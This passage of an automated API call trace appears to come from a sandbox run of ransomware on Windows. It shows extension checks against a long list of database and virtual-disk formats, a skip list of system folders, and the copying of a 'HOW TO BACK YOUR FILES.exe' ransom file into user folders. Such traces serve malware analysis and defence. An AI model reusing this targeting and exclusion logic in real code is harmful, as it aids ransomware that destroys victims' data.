-1 [0040.221] lstrlenW (lpString="zip") returned 3 [0040.221] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0040.221] lstrlenW (lpString="tgz") returned 3 [0040.221] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0040.221] lstrlenW (lpString="vbox") returned 4 [0040.221] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0040.221] lstrlenW (lpString="vdi") returned 3 [0040.221] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0040.221] lstrlenW (lpString="vhd") returned 3 [0040.221] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0040.221] lstrlenW (lpString="vhdx") returned 4 [0040.221] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0040.221] lstrlenW (lpString="avhd") returned 4 [0040.221] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0040.221] lstrlenW (lpString="db") returned 2 [0040.221] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0040.221] lstrlenW (lpString="db2") returned 3 [0040.221] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0040.221] lstrlenW (lpString="db3") returned 3 [0040.221] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0040.221] lstrlenW (lpString="dbf") returned 3 [0040.221] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0040.221] lstrlenW (lpString="mdf") returned 3 [0040.221] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0040.221] lstrlenW (lpString="mdb") returned 3 [0040.221] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0040.221] lstrlenW (lpString="sql") returned 3 [0040.221] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0040.222] lstrlenW (lpString="sqlite") returned 6 [0040.222] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0040.222] lstrlenW (lpString="sqlite3") returned 7 [0040.222] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0040.222] lstrlenW (lpString="sqlitedb") returned 8 [0040.222] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0040.222] lstrlenW (lpString="xml") returned 3 [0040.222] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0040.222] lstrlenW (lpString="$er") returned 3 [0040.222] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0040.222] lstrlenW (lpString="4dd") returned 3 [0040.222] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0040.222] lstrlenW (lpString="4dl") returned 3 [0040.222] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0040.222] lstrlenW (lpString="^^^") returned 3 [0040.222] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0040.222] lstrlenW (lpString="abs") returned 3 [0040.222] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0040.222] lstrlenW (lpString="abx") returned 3 [0040.222] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0040.222] lstrlenW (lpString="accdb") returned 5 [0040.222] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0040.222] lstrlenW (lpString="accdc") returned 5 [0040.222] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0040.222] lstrlenW (lpString="accde") returned 5 [0040.222] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0040.222] lstrlenW (lpString="accdr") returned 5 [0040.222] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0040.222] lstrlenW (lpString="accdt") returned 5 [0040.222] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0040.222] lstrlenW (lpString="accdw") returned 5 [0040.222] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0040.222] lstrlenW (lpString="accft") returned 5 [0040.222] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0040.223] lstrlenW (lpString="adb") returned 3 [0040.223] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0040.223] lstrlenW (lpString="adb") returned 3 [0040.223] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0040.223] lstrlenW (lpString="ade") returned 3 [0040.223] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0040.223] lstrlenW (lpString="adf") returned 3 [0040.223] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0040.223] lstrlenW (lpString="adn") returned 3 [0040.223] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0040.223] lstrlenW (lpString="adp") returned 3 [0040.223] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0040.223] lstrlenW (lpString="alf") returned 3 [0040.223] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0040.223] lstrlenW (lpString="ask") returned 3 [0040.223] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0040.223] lstrlenW (lpString="btr") returned 3 [0040.223] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0040.223] lstrlenW (lpString="cat") returned 3 [0040.223] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0040.223] lstrlenW (lpString="cdb") returned 3 [0040.223] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0040.223] lstrlenW (lpString="ckp") returned 3 [0040.223] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0040.223] lstrlenW (lpString="cma") returned 3 [0040.223] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0040.223] lstrlenW (lpString="cpd") returned 3 [0040.223] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0040.223] lstrlenW (lpString="dacpac") returned 6 [0040.223] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0040.223] lstrlenW (lpString="dad") returned 3 [0040.223] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0040.223] lstrlenW (lpString="dadiagrams") returned 10 [0040.223] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0040.223] lstrlenW (lpString="daschema") returned 8 [0040.223] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0040.224] lstrlenW (lpString="db-journal") returned 10 [0040.224] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0040.224] lstrlenW (lpString="db-shm") returned 6 [0040.224] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0040.224] lstrlenW (lpString="db-wal") returned 6 [0040.224] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0040.224] lstrlenW (lpString="dbc") returned 3 [0040.224] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0040.224] lstrlenW (lpString="dbs") returned 3 [0040.224] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0040.224] lstrlenW (lpString="dbt") returned 3 [0040.224] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0040.224] lstrlenW (lpString="dbv") returned 3 [0040.224] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0040.224] lstrlenW (lpString="dbx") returned 3 [0040.224] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0040.224] lstrlenW (lpString="dcb") returned 3 [0040.224] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0040.224] lstrlenW (lpString="dct") returned 3 [0040.224] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0040.224] lstrlenW (lpString="dcx") returned 3 [0040.224] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0040.224] lstrlenW (lpString="ddl") returned 3 [0040.224] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0040.224] lstrlenW (lpString="dlis") returned 4 [0040.224] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0040.224] lstrlenW (lpString="dp1") returned 3 [0040.224] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0040.224] lstrlenW (lpString="dqy") returned 3 [0040.224] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0040.224] lstrlenW (lpString="dsk") returned 3 [0040.224] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0040.224] lstrlenW (lpString="dsn") returned 3 [0040.224] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0040.224] lstrlenW (lpString="dtsx") returned 4 [0040.224] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0040.225] lstrlenW (lpString="dxl") returned 3 [0040.225] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0040.225] lstrlenW (lpString="eco") returned 3 [0040.225] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0040.225] lstrlenW (lpString="ecx") returned 3 [0040.225] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0040.225] lstrlenW (lpString="edb") returned 3 [0040.225] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0040.225] lstrlenW (lpString="epim") returned 4 [0040.225] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0040.225] lstrlenW (lpString="fcd") returned 3 [0040.225] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0040.225] lstrlenW (lpString="fdb") returned 3 [0040.225] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0040.225] lstrlenW (lpString="fic") returned 3 [0040.225] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0040.225] lstrlenW (lpString="flexolibrary") returned 12 [0040.225] lstrlenW (lpString="fm5") returned 3 [0040.225] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0040.225] lstrlenW (lpString="fmp") returned 3 [0040.225] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0040.225] lstrlenW (lpString="fmp12") returned 5 [0040.225] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0040.225] lstrlenW (lpString="fmpsl") returned 5 [0040.225] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0040.225] lstrlenW (lpString="fol") returned 3 [0040.225] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0040.225] lstrlenW (lpString="fp3") returned 3 [0040.225] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0040.225] lstrlenW (lpString="fp4") returned 3 [0040.225] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0040.225] lstrlenW (lpString="fp5") returned 3 [0040.225] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0040.225] lstrlenW (lpString="fp7") returned 3 [0040.225] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0040.225] lstrlenW (lpString="fpt") returned 3 [0040.225] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0040.226] lstrlenW (lpString="frm") returned 3 [0040.226] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0040.226] lstrlenW (lpString="gdb") returned 3 [0040.226] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0040.226] lstrlenW (lpString="gdb") returned 3 [0040.226] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0040.226] lstrlenW (lpString="grdb") returned 4 [0040.226] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0040.226] lstrlenW (lpString="gwi") returned 3 [0040.226] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0040.226] lstrlenW (lpString="hdb") returned 3 [0040.226] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0040.226] lstrlenW (lpString="his") returned 3 [0040.226] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0040.226] lstrlenW (lpString="ib") returned 2 [0040.226] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0040.226] lstrlenW (lpString="idb") returned 3 [0040.226] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0040.226] lstrlenW (lpString="ihx") returned 3 [0040.226] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0040.226] lstrlenW (lpString="itdb") returned 4 [0040.226] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0040.226] lstrlenW (lpString="itw") returned 3 [0040.226] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0040.227] lstrlenW (lpString="jet") returned 3 [0040.227] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0040.227] lstrlenW (lpString="jtx") returned 3 [0040.227] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0040.227] lstrlenW (lpString="kdb") returned 3 [0040.227] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0040.227] lstrlenW (lpString="kexi") returned 4 [0040.227] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0040.227] lstrlenW (lpString="kexic") returned 5 [0040.227] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0040.227] lstrlenW (lpString="kexis") returned 5 [0040.227] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0040.227] lstrlenW (lpString="lgc") returned 3 [0040.227] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0040.227] lstrlenW (lpString="lwx") returned 3 [0040.227] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0040.227] lstrlenW (lpString="maf") returned 3 [0040.227] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0040.227] lstrlenW (lpString="maq") returned 3 [0040.227] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0040.227] lstrlenW (lpString="mar") returned 3 [0040.227] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0040.227] lstrlenW (lpString="marshal") returned 7 [0040.227] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0040.227] lstrlenW (lpString="mas") returned 3 [0040.227] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0040.227] lstrlenW (lpString="mav") returned 3 [0040.227] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0040.227] lstrlenW (lpString="maw") returned 3 [0040.227] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0040.227] lstrlenW (lpString="mdbhtml") returned 7 [0040.228] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0040.228] lstrlenW (lpString="mdn") returned 3 [0040.228] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0040.228] lstrlenW (lpString="mdt") returned 3 [0040.228] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0040.228] lstrlenW (lpString="mfd") returned 3 [0040.228] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0040.228] lstrlenW (lpString="mpd") returned 3 [0040.228] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0040.228] lstrlenW (lpString="mrg") returned 3 [0040.228] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0040.228] lstrlenW (lpString="mud") returned 3 [0040.228] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0040.228] lstrlenW (lpString="mwb") returned 3 [0040.228] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0040.228] lstrlenW (lpString="myd") returned 3 [0040.228] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0040.228] lstrlenW (lpString="ndf") returned 3 [0040.228] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0040.228] lstrlenW (lpString="nnt") returned 3 [0040.228] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0040.228] lstrlenW (lpString="nrmlib") returned 6 [0040.228] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0040.228] lstrlenW (lpString="ns2") returned 3 [0040.228] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0040.228] lstrlenW (lpString="ns3") returned 3 [0040.228] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0040.228] lstrlenW (lpString="ns4") returned 3 [0040.228] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0040.228] lstrlenW (lpString="nsf") returned 3 [0040.228] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0040.228] lstrlenW (lpString="nv") returned 2 [0040.228] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0040.228] lstrlenW (lpString="nv2") returned 3 [0040.228] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0040.228] lstrlenW (lpString="nwdb") returned 4 [0040.228] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0040.229] lstrlenW (lpString="nyf") returned 3 [0040.229] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0040.229] lstrlenW (lpString="odb") returned 3 [0040.229] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0040.229] lstrlenW (lpString="odb") returned 3 [0040.229] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0040.229] lstrlenW (lpString="oqy") returned 3 [0040.229] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0040.229] lstrlenW (lpString="ora") returned 3 [0040.229] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0040.229] lstrlenW (lpString="orx") returned 3 [0040.229] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0040.229] lstrlenW (lpString="owc") returned 3 [0040.229] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0040.229] lstrlenW (lpString="p96") returned 3 [0040.229] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0040.229] lstrlenW (lpString="p97") returned 3 [0040.229] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0040.229] lstrlenW (lpString="pan") returned 3 [0040.229] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0040.229] lstrlenW (lpString="pdb") returned 3 [0040.229] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0040.229] lstrlenW (lpString="pdm") returned 3 [0040.229] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0040.229] lstrlenW (lpString="pnz") returned 3 [0040.229] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0040.229] lstrlenW (lpString="qry") returned 3 [0040.229] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0040.229] lstrlenW (lpString="qvd") returned 3 [0040.229] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0040.229] lstrlenW (lpString="rbf") returned 3 [0040.229] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0040.229] lstrlenW (lpString="rctd") returned 4 [0040.229] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0040.229] lstrlenW (lpString="rod") returned 3 [0040.229] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0040.229] lstrlenW (lpString="rodx") returned 4 [0040.230] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0040.230] lstrlenW (lpString="rpd") returned 3 [0040.230] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0040.230] lstrlenW (lpString="rsd") returned 3 [0040.230] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0040.230] lstrlenW (lpString="sas7bdat") returned 8 [0040.230] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0040.230] lstrlenW (lpString="sbf") returned 3 [0040.230] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0040.230] lstrlenW (lpString="scx") returned 3 [0040.230] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0040.230] lstrlenW (lpString="sdb") returned 3 [0040.230] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0040.230] lstrlenW (lpString="sdc") returned 3 [0040.230] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0040.230] lstrlenW (lpString="sdf") returned 3 [0040.230] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0040.230] lstrlenW (lpString="sis") returned 3 [0040.230] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0040.230] lstrlenW (lpString="spq") returned 3 [0040.230] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0040.230] lstrlenW (lpString="te") returned 2 [0040.230] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0040.230] lstrlenW (lpString="teacher") returned 7 [0040.230] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0040.230] lstrlenW (lpString="tmd") returned 3 [0040.230] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0040.230] lstrlenW (lpString="tps") returned 3 [0040.230] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0040.230] lstrlenW (lpString="trc") returned 3 [0040.230] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0040.230] lstrlenW (lpString="trc") returned 3 [0040.230] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0040.230] lstrlenW (lpString="trm") returned 3 [0040.230] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0040.230] lstrlenW (lpString="udb") returned 3 [0040.231] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0040.231] lstrlenW (lpString="udl") returned 3 [0040.231] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0040.231] lstrlenW (lpString="usr") returned 3 [0040.231] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0040.231] lstrlenW (lpString="v12") returned 3 [0040.231] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0040.231] lstrlenW (lpString="vis") returned 3 [0040.231] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0040.231] lstrlenW (lpString="vpd") returned 3 [0040.231] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0040.231] lstrlenW (lpString="vvv") returned 3 [0040.231] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0040.231] lstrlenW (lpString="wdb") returned 3 [0040.231] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0040.231] lstrlenW (lpString="wmdb") returned 4 [0040.231] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0040.231] lstrlenW (lpString="wrk") returned 3 [0040.231] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0040.231] lstrlenW (lpString="xdb") returned 3 [0040.231] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0040.231] lstrlenW (lpString="xld") returned 3 [0040.231] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0040.231] lstrlenW (lpString="xmlff") returned 5 [0040.231] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0040.231] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x496c03c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x496c03c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0040.231] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0040.231] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4970c680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4970c680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 1 [0040.231] lstrcmpiW (lpString1="Sample Pictures", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.231] lstrcmpiW (lpString1="Sample Pictures", lpString2="aoldtz.exe") returned 1 [0040.231] lstrcmpiW (lpString1="Sample Pictures", lpString2=".") returned 1 [0040.231] lstrcmpiW (lpString1="Sample Pictures", lpString2="..") returned 1 [0040.231] lstrcmpiW (lpString1="Sample Pictures", lpString2="windows") returned -1 [0040.231] lstrcmpiW (lpString1="Sample Pictures", lpString2="bootmgr") returned 1 [0040.232] lstrcmpiW (lpString1="Sample Pictures", lpString2="temp") returned -1 [0040.232] lstrcmpiW (lpString1="Sample Pictures", lpString2="pagefile.sys") returned 1 [0040.232] lstrcmpiW (lpString1="Sample Pictures", lpString2="boot") returned 1 [0040.232] lstrcmpiW (lpString1="Sample Pictures", lpString2="ids.txt") returned 1 [0040.232] lstrcmpiW (lpString1="Sample Pictures", lpString2="ntuser.dat") returned 1 [0040.232] lstrcmpiW (lpString1="Sample Pictures", lpString2="perflogs") returned 1 [0040.232] lstrcmpiW (lpString1="Sample Pictures", lpString2="MSBuild") returned 1 [0040.232] lstrlenW (lpString="Sample Pictures") returned 15 [0040.232] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures\\desktop.ini") returned 49 [0040.232] lstrcpyW (in: lpString1=0x2e2e8ac, lpString2="Sample Pictures" | out: lpString1="Sample Pictures") returned="Sample Pictures" [0040.232] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2240 [0040.232] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6c) returned 0x2cb310 [0040.232] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2248 | out: ListHead=0x2e77d0, ListEntry=0x2d2248) returned 0x2e7cd0 [0040.232] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4970c680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4970c680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 0 [0040.232] FindClose (in: hFindFile=0x2ccfa8 | out: hFindFile=0x2ccfa8) returned 1 [0040.232] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2248 [0040.232] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures") returned="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures" [0040.232] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0040.232] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0040.232] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures") returned 53 [0040.232] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures") returned="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures" [0040.232] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.232] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\documents\\my pictures\\sample pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0040.233] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0040.233] GetLastError () returned 0x0 [0040.233] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0040.233] ReadFile (in: hFile=0x124, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0040.233] CloseHandle (hObject=0x124) returned 1 [0040.233] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0040.233] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.233] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4970c680, 